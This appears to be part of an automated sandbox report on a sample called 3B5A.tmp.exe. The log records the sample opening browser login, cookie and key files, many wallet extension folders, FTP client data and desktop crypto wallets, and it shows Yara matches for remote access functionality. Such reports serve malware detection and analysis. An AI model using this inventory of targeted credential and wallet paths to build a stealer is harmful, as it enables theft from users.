        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeDirectory queried: number of queries: 1001
        Source: Yara matchFile source: 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 3B5A.tmp.exe PID: 7688, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 3B5A.tmp.exe PID: 7688, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
